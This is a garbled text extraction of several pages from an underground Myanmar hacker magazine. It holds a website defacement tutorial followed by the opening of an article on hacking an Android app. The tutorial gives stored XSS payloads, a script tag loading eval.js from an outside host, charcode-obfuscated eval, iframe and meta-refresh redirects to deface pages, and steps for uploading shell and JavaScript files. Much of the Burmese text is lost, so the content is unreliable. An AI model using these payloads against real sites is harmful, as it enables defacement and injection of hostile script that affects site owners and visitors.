144 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH Notice Info ႔ Tag Add Notice ။ ( ႔ Tag ႔) <script>alert(0); </script> Add New Record Title Browse Pdf S t။ Home Page Alert 0 ႔ XSS message box ။ Alert 0 ႔ ႔A t Deface ႔ ။ ( ႔ XSS ႔။ XSS alert bypass ႔႔ ႔ ။) <script>alert(0); </script> ႔ ။ ၂။ ႔ ႔ Hosting ။ Shell ။ https://pastebin.com/H45d88BJ C yourname.js ႔ S upload ႔။ www.yourshellsite.com/yourname.js URL XSS Alert ။ <script src=\"http://www.mmsecurity.net/eval.js\"></script> ။ ႔။ ႔ eval.js Power By Union Of Underground Myanmar Hackers
145 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH ၐ submit ။ Home Page Deface WD ။ ၃။ Shell Folder ။ Folder deface.html Upload ။www.example.com/Folder/yourdeface.html Deface Page ႔ https://pastebin.com/76Cmxjwg Edit <iframe src='http://www.iran118.co.uk/ugv2.html' URL <iframe src='www.example.com/Folder/yourdeface.html' ။ .js ။ ႔S Shell Deface.html ႔ Folder Upload URL /F / ။ Defacement ။ Photo ။ <script src=\"www.example.com/Folder/yourname.js\"></script> ၄။ Free Hosting or Website Shell ႔ .js ။ https://pastebin.com/H45d88BJ yourname.js ႔ S File http://yourjavascript.com/ ႔ upload ။ Power By Union Of Underground Myanmar Hackers
146 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH Processing... The file olo.js has been uploaded.Your javascript link will be sent to [email protected] in 5 minutes...If you have trouble to find the email, just check in bulk folder ၐ။ gmail ။G Recovery ႔။ mail ႔ XSS Deface Script ။ ၅။ Shell or Free Hosting ႔ Website Charcode ။။ http://jdstiles.com/java/cct.html Power By Union Of Underground Myanmar Hackers
147 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH <script language=javascript>eval(String.fromCharCode(PLACE CharCode HERE ))</script> ႔ Charcode .js Save ။ .js http://yourjavascript.com/ ႔ Upload gmail ႔ XSS Defacement ႔။ ၆။ Redirect Defacement ႔ tt :// / t Deface ။ page XSS Alert ႔ ႔ Tag Defacement <META http-equiv=\"refresh\" content=\"1;URL=http://example.com/yourdeface.html \"> Shell JS or XSS Defacement ႔႔ ။ ႔ Thanks for your patient, mr.Gh0st N@0b Power By Union Of Underground Myanmar Hackers
149 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH How I hacked Android App Author – Thin Ba Shane ( http://location-href.com ) Table of Contents Introduction First Vulnerability – Insecure Direct Object Reference ( Web ) Second Vulnerability – Insecure Data Storage ( Android ) Third Vulnerability – Missing Functional Level Access Control ( Android ) Introduction ႔ MP ႔ ။M P ႔M A ။ Android ၊ IOS ၊ Windows Operating System ၐ ။ ႔ Android A Develop A develop ။ ႔။ App Sec ႔ ႔ Android App Sec ႔ UG Mangazine ႔ ႔ Android App Sec ။ Android Application Security ။႔ ႔ ႔။ ။ ၊ Android app ႔ Java ႔ ၊ C Native code ႔ ၊ ။ ႔ Android App Security ၊ Web App Sec PHP ႔ ။ ႔ Online php ႔ WA jsp , asp.net ႔ ႔၊ PHP Security ႔ ႔ ။ Android App Sec A D ႔။ Android App ၊ Android ၊ JVM ၊ Dalvik Machine ။ ႔။ Android Architecture ၊A ၊ Power By Union Of Underground Myanmar Hackers